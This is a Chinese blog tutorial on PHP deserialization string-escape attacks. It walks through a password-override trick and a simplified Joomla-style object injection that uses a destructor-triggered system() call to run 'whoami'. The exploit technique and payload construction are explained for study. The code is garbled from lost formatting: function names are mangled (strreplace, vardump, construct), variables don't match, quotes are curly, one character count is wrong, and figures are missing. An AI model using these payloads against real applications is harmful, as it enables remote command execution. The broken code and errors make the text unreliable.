浅析php反序列化字符串逃逸
darkless

php序列化与反序列化

我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,反序列化输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。

序列化(串行化):是将变量转换为可保存或传输的字符串的过程;
反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。

常见的php序列化和反序列化函数有:serialize,unserialize。

serialize() —> 函数用于序列化对象或数组,并返回一个字符串。如下:

<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($_sites);
echo $serializeddata;
?>_

结果为:

a:3:{i:0;s:2:"t1";i:1;s:3:"tt2";i:2;s:4:"ttt3";}

各个字符的意义 —> o表示对象,a表示数组,s表示字符,i表示数字
a:3 表示有三个数组
i:0,表示第一个数组,s:2:”t1”,表示第一个数组是字符,2表示有两个字符,为”t1”
i:1,表示第二个数组,s:3:”tt2”,表示第二个数组是字符,3表示有三个字符,为”tt2”
i:2,表示第三个数组,s:4:”ttt3”,表示第三个数组是字符,4表示有三个字符,为”ttt3”

再举一个例子:

<?php
Classtest{
public $a= '1';
public $bb= 2;
public $ccc= True;
}

$r= new test();
echo serialize($r);

结果为:

O:4:"test":3:{s:1:"a";s:1:"1";s:2:"bb";i:2;s:3:"ccc";b:1;}

其中各个字符的含义是:

image

php反序列化的几个特性

1.类中不存在的属性也会进行反序列化;
2.对于类和数组的反序列化,以;作为字段的分隔,以}作为结尾,若在}后再加数据将直接被丢弃;
3.反序列化按照严格的格式进行。

由于PHP反序列化中的字符逃逸只用到了第二个特性,所以重点看下第二个特性。

当我们反序列这个字符串a:2:{i:0;s:6:"peri0d";i:1;s:5:"aaaaa";},得到的结果为:

array(2) {
[0] =>
string(6) "peri0d"
[1] =>
string(5) "aaaaa"
}

当把字符串改为a:2:{i:0;s:6:"peri0d";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";时,反序列化会得到同样的结果:

image

给出一个问题,代码如下,如何在username可控的情况下将密码修改为123456?

_<?php
function filter($string){
return strreplace('x','yy',$string);
}

$username = "peri0d";
$password = "aaaaa";_
$user = array($username, $password);

$r = filter(serialize($_user));

vardump($r);
echo '\n';

vardump(unserialize($r));_

分析:
正常情况下序列化的结果为:

a:2:{i:0;s:6:"peri0d";i:1;s:5:"aaaaa";}

如果把username改为peri0dxx,序列化结果就变成了:

a:2:{i:0;s:8:"peri0dyyyy";i:1;s:5:"aaaaa";}

这时候由于filter函数的关系,peri0dyyyy明明为10个字符,但是序列化字符串中却显示为8个字符,那么反序列化时必定会失败

image

那么如何才能修改密码呢?依据第二条规则,只需要把序列化后的字符串改为a:2:{i:0;s:6:"peri0d";i:1;s:6:"123456";}i:1;s:5:"aaaaa";},那么在反序列化之后就可以成功修改密码:

image

目标明确:
1.输入可控的username,
2.利用filter函数将序列化后的字符串改为如下格式的
a:2:{i:0;s:6:"peri0d";i:1;s:6:"123456";}i:1;s:5:"aaaaa";}
3.经过反序列化之后,忽律第一个}后面的字符,使得123456逃逸出来成为我们的密码。

经过计算";i:1;s:6:"123456";}共有20个字符,加上peri0d共26个字符

image

如果把peri0d改为peri0dxx后经过filter函数就变成了peri0dyyyy,这是总共就为28个字符。

image

此时明显不能正常反序列化,那么就需要增加x直到可以正确反序列化,经过测试当增加到20个x时成功:

image

123456成功逃逸出来修改了密码。

一个例子

这个例子是Joomla的逃逸,下面是有人写出的一个简易的Joomla处理反序列化的机制:

<?php
class evil{
public $cmd;

public function construct($cmd){
$this->cmd = $cmd;
}

public function destruct(){
system($this->cmd);
}
}

class User
{
public $username;
public $password;

public function construct($username, $password){
$this->username = $username;
$this->password = $password;
}

}

function write($data){
$data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
file_put_contents("dbs.txt", $data);
}

function read(){
$data = file_get_contents("dbs.txt");
$r = str_replace('\0\0\0', chr(0).'*'.chr(0), $_data);
return $r;
}

if(fileexists("dbs.txt")){
unlink("dbs.txt");
}_

$username = $_GET["username"];
echo $username;
echo " ";_
$password = $_GET["password"];
echo $password;
write(serialize(new User(_$username, $_password)));
vardump(unserialize(read()));_

上述代码的大致意思是当向dbs.txt写如数据时会将_chr(0).''.chr(0)_替换为\0\0\0,读数据时则相反。

漏洞点在_strreplace(chr(0).''.chr(0), '\0\0\0', $data),因为joomla会将数据存储到mysql数据库中,protected变量序列化之后会有\x00\x00_,那么mysql数据库不能存储空字符,所以在写入数据库之前经过替换,会将三个字符替换成六个字符,在反序列化时,会在读取的处理回来,这就导致存在逃逸。

反序列化读取的时候将会将六位字符\0\0\0替换成三位字符_chr(0)chr(0)_,因此字符串前面的s肯定是固定的,那么s对应的字符串变少以后将会吞掉其他属性的字符,那么如果我们精心算好吞掉的字符长度,并且能够控制被吞掉属性的内容,那么就能够注入对象,从而反序列化其他类

正常情况下序列化的结果为:

O:4:"User":2:{s:8:"username";s:4:"test";s:8:"password";s:6:"123456";}

当一个对象销毁时会执行**destruct()**函数,我们的目标是构造payload注入到evil类中进而执行system()函数。

所以payload为s:2:"rs";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}

image

比如如上所示,此时我们要注入的对象为evil,此时username和password的值我们可控,那么我们可以在username中注入\0,来吞掉password的值,比如

image

首先确定要吞掉的字符串长度:

O:4:"User":2:{s:8:"username";s:4:"test";s:8:"password";s:6:"123456";}

要吞掉的字符串长度为:“;s:8:"password";s:6:“123456共28个字符。

因为注入的payload长度为肯定是个二位数,所以第二个s后面肯定为二位数,所以要吞掉的字符串长度至少为29个字符。

现在就是需要在username中加入\0判断经过read函数出来过后的长度,由于每加入一组\0\0\0就可以吞掉3个字符。

假设构造username为\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
其长度为54。

经过read函数处理后其长度变为了27

image

即可吞掉27个字符,但是上面计算需要吞掉29个字符,由于吞掉的字符长度总是3的倍数,所以最方便的办法还是将密码改为1234,这样需要吞掉的字符串长度就变成了27。

接下里就可以构造payload了。

<?php
$username = ‘\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0’;
$payload = 's:2:"rs";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}';
$password = '1234";'.$payload."}";
echo $username;
echo "\n";
echo $password;

执行上述payload观察序列化结果:

image

db.txt文件中的内容:

O:4:"User":2:{s:8:"username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:8:"password";s:54:"1234";s:2:"ts";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}}";}

可看到s:54在反序列化之后正好覆盖了";s:8:"password";s:54:"1234这个27个字符,从而导致evil对象的注入。

总结起来要达到字符串逃逸导致对象注入的要求有:
1.相邻两个属性的值是我们可以控制的
2.前一个属性的s长度可以发生变化,变长变短都可以,变短的话可以吞掉后面相邻属性的值,然后在相邻属性中注入新的对象,如果边长则可以直接在该属性中注入对象来达到反序列化

参考文章

详解PHP反序列化中的字符逃逸
php字符串逃逸导致的对象注入
PHP字符逃逸导致的对象注入
Joomla3.4.6 RCE漏洞分析

 评论
评论插件加载失败
正在加载评论插件